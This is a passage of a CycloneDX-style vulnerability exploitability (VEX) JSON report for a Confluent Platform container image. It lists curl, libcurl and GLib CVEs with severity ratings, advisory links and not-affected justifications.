        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2023-29499",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in GLib. GVariant deserialization fails to validate that the input conforms to the expected format, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-29499"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-29499"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211828"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2794"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-29499.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00030.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29499"
        },
        {
          "url": "https://security.gentoo.org/glsa/202311-18"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231103-0001/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-29499"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:50:13+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-32611",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A flaw was found in GLib. GVariant deserialization is vulnerable to a slowdown issue where a crafted GVariant can cause excessive processing, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32611"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32611"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211829"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2797"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32611.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00030.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32611"
        },
        {
          "url": "https://security.gentoo.org/glsa/202311-18"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231027-0005/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32611"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-23T18:17:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-32636",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32636"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32636"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2841"
        },
        {
          "url": "https://https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32636.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32636"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231110-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:59:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-32665",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in GLib. GVariant deserialization is vulnerable to an exponential blowup issue where a crafted GVariant can cause excessive processing, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32665"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32665"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2211827"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2121"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32665.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00030.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32665"
        },
        {
          "url": "https://security.gentoo.org/glsa/202311-18"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240426-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32665"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:59:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
